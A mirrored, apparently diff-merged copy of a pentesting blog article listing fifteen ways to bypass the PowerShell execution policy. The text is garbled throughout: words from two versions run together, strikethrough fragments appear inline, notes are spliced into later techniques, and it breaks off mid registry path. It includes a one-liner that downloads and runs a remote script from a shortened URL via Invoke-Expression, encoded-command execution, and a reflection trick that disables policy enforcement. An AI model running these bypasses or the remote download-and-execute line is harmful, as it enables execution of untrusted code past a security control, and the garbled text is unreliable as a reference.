Bypass the PowerShell Execution Policy

💻 15 Ways to Bypass the PowerShell Execution Policy

Author: Scott Sutherland

~~Original Article:~~Source: NetSPI Blog

🧠 Introduction

ByPowerShell’s ~~default,~~execution ~~PowerShell~~policy is ~~configured~~a safety feature designed to prevent the unintended execution of ~~scripts~~scripts. onHowever, ~~Windows systems. This can pose challenges for~~during penetration ~~testers,~~tests ~~system~~or ~~administrators,~~red ~~and~~team ~~developers.~~operations, ~~However,~~you ~~there~~may ~~are multiple methods~~need to bypass ~~these~~this ~~restrictions~~restriction — without ~~requiring~~administrative ~~local administrator rights.~~privileges.

1.🔐 Bypass Techniques

Paste ~~the Script~~ into anInteractive ~~Interactive~~Console
Open a PowerShell ~~Console~~
~~Simply copy~~console and paste ~~your PowerShell~~the script ~~directly~~directly. ~~into~~Execution anpolicy ~~interactive~~is ~~console.~~not ~~This~~enforced ~~method~~line-by-line.

~~doesn't require writing to disk or changing configurations.~~

2.
Echo the Script and Pipe it to PowerShell Standard Input

Echoecho Write-Host "My voice is my passport, verify me." | PowerShell.exepowershell -noprofile -

3. Read Script from a
Pipe File and PipeContents to PowerShell Standard Input

Get-Content .\runme.ps1 | PowerShell.exepowershell -noprofile -

TYPEtype .\runme.ps1 | PowerShell.exepowershell -noprofile -

4.
Download Script from URL and Execute withvia Invoke Expression

IEX

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')"

5.
Use the -Command Switch

Parameter

PowerShellpowershell -command "Write-Host 'MyExecution voicepolicy? isWhat my passport, verify me.policy?'"

6.
Use theEncodedCommand
Encode EncodeCommandyour Switch

script into Base64 and pass it:


$command = "Write-Host 'MyExecution voicepolicy? isWhat my passport, verify me.policy?'"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
powershell.exepowershell -EncodedCommand $encodedCommand

7.📘 Use the Invoke-Command CommandNotes

Invoke-Command
-ScriptBlockMost {Write-Hostmethods "Mydon’t voicerequire isadmin myrights.
passport,These verifyare me."}

8. Use the Invoke-Expression Command

Get-Content .\runme.ps1 | Invoke-Expression

9. Use the “Bypass” Execution Policy Flag

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1

10. Use the “Unrestricted” Execution Policy Flag

PowerShell.exe -ExecutionPolicy UnRestricted -File .\runme.ps1

11. Use the “Remote-Signed” Execution Policy Flag

PowerShell.exe -ExecutionPolicy RemoteSigned -File .\runme.ps1

12. Disable ExecutionPolicy by Swapping out the AuthorizationManager

function Disable-ExecutionPolicy {
  ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue($executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))
}
Disable-ExecutionPolicy
.\runme.ps1

13. Set the ExecutionPolicyhelpful for thepentesting, Processscripting, Scope

Set-ExecutionPolicywhen Bypassgroup -Scopepolicy Process

interferes

14.with Setlegitimate theautomation. ExecutionPolicy
Ensure foryou're thecomplying CurrentUserwith Scopelocal viapolicies Command

and

Set-ExecutionPolicylaws -Scopewhen CurrentUserusing -ExecutionPolicythese UnRestricted

techniques.

15. Set the ExecutionPolicy for the CurrentUser Scope via the Registry

~~Modify~~Last ~~the~~mirrored ~~registry~~from ~~key:~~NetSPI: https://www.netspi.com/blog/...

HKEY_CURRENT_USER\Softw